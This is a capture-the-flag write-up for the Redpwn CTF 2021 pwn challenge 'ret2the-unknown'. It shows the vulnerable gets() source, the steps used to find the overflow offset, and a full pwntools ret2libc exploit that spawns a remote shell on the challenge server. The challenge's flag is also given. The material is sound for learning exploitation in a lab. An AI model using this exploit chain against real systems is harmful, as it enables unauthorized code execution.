## ret2the-unknown

* **CTF:** Redpwn CTF 2021
* **Category:** pwn
* **Points:** 110
* **Author(s):** b0uldrr
* **Date:** 10/07/21

---

### Challenge
```
hey, my company sponsored map doesn't show any location named "libc"!
nc mc.ax 31568
```

### Downloads
* [ret2the-unknown](ret2the-unknown)
* [ret2the-unknown.c](ret2the-unknown.c)
* [libc-2.28.so](libc-2.28.so)
* [ld-2.28.so](ld-2.28.so)

---

### Solution

ret2the-unknown.c
```c
#include <stdio.h>
#include <string.h>

int main(void)
{
  char your_reassuring_and_comforting_we_will_arrive_safely_in_libc[32];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("that board meeting was a *smashing* success! rob loved the challenge!");
  puts("in fact, he loved it so much he sponsored me a business trip to this place called 'libc'...");
  puts("where is this place? can you help me get there safely?");

  // please i cant afford the medical bills if we crash and segfault
  gets(your_reassuring_and_comforting_we_will_arrive_safely_in_libc);

  puts("phew, good to know. shoot! i forgot!");
  printf("rob said i'd need this to get there: %llx\n", printf);
  puts("good luck!");
}
```

```
$ checksec ret2the-unknown        
[*] '/home/kali/ctf/redpwn-ctf-2021/ret2the-unknown/ret2the-unknown'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

```
$ file ret2the-unknown        
ret2the-unknown: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b7b98f7a1d1f0839d59fecf892559a06c275a480, for GNU/Linux 3.2.0, not stripped
```

This was my second successful ret2libc attack in a CTF. See "dROPit" from Newark Academy CTF 2020 for my first one. This one was much easier because:
1. The version of libc used by the binary was included with the challenge downloads
2. The binary already prints the GOT address of `printf`

So you can see from my original plan from the "dROPTit" challenge last year, steps 2, 3 and 4 are already completed for us:

The plan of attack:

1. Determine the number of bytes we need to overflow to get to the return address on the stack.
2. ~~Leak the address of `printf` from the GOT.~~
3. ~~Take the last 3 bytes of that address and use https://libc.rip to determine which version of libc the remote server is using.~~
4. ~~Download that version of libc and store it in the local diectory for reference by the python script.~~
5. Leak the `printf` address again but return control to main()
6. Use that address to determine the offset of libc in memory (libc_address = leaked_printf - libc_printf)
7. Now with the base address of libc, we can overflow the buffer with a system("/bin/sh") call to get a shell


Determine overflow offset:
```
$ msf-pattern_create -l 100 > pattern.txt
$ gdb ret2the-unknown
gdb-peda$ run < pattern.txt
gdb-peda$ x/wx $rsp
0x7fffffffdf88: 0x62413362
$ msf-pattern_offset -q 0x62413362
[*] Exact match at offset 40
```

By running the binary, we can see that the address of `printf` is presented in in the format of `7ff5333ffcf0`. To use this in my solution python script, I'll just need to append `0x` to the front and then convert the whole thing to a base 16 integer to get the address:
```
$ ./ret2the-unknown 
that board meeting was a *smashing* success! rob loved the challenge!
in fact, he loved it so much he sponsored me a business trip to this place called 'libc'...
where is this place? can you help me get there safely?
test input
phew, good to know. shoot! i forgot!
rob said i'd need this to get there: 7ff5333ffcf0
good luck!
```

Here's my final solution script:
```py
#!/usr/bin/python3

from pwn import *

binary = context.binary = ELF('./ret2the-unknown')

local = False
if local:                                                                                                          
    conn = process(binary.path)                                                                                
    libc = binary.libc
else:                                                                                                              
    conn = remote('mc.ax', 31568) 
    libc = ELF('./libc-2.28.so')

# Find some useful gadgets
rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]

# Overflow amount to return address. Gathered by msf-pattern_create cyclical overflow and GDB PEDA
payload  = b'A' * 40 

# Return to main()
payload += p64(binary.sym['main'])

# Send our payload
conn.recvuntil('where is this place? can you help me get there safely?')
conn.sendline(payload)

# Receive 2 lines of un-needed junk
conn.recvline()
conn.recvline()

# Receive the line with the address of printf and carve out the address
# We do that by appending an "0x" to the front of the address and then converting to a base16 int
printf_addr = int(("0x" + conn.recvline().strip().split()[-1].decode()), 16)

print('printf addr   : ' + hex(printf_addr))
print('last 3 bytes  : ' + hex(printf_addr)[-3:])

# Determine the offset of libc
libc.address = printf_addr - libc.sym['printf']
print('offset      : ' + hex(libc.address))

# Overflow the buffer again, this time filling it with bytes to call `system("/bin/sh")`:
payload  = b'A' * 40 
payload += p64(pop_rdi)
payload += p64(libc.search(b'/bin/sh').__next__())
payload += p64(libc.sym['system'])

# Send our payload
conn.recvuntil('where is this place? can you help me get there safely?')
conn.sendline(payload)

# Play with our new shell
conn.interactive()
```

Running it, we get a shell and can print flag.txt:
```
$ ./soln.py        
[*] '/home/kali/ctf/redpwn-ctf-2021/ret2the-unknown/ret2the-unknown'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to mc.ax on port 31568: Done
[*] '/home/kali/ctf/redpwn-ctf-2021/ret2the-unknown/libc-2.28.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Loaded 14 cached gadgets for './ret2the-unknown'
printf addr   : 0x7f109429e560
last 3 bytes  : 560
offset      : 0x7f1094246000
[*] Switching to interactive mode

phew, good to know. shoot! i forgot!
rob said i'd need this to get there: 7f109429e560
good luck!
$ ls
flag.txt
run
$ cat flag.txt
flag{rob-is-proud-of-me-for-exploring-the-unknown-but-i-still-cant-afford-housing}
```

---

### Flag 
```
flag{rob-is-proud-of-me-for-exploring-the-unknown-but-i-still-cant-afford-housing}
```
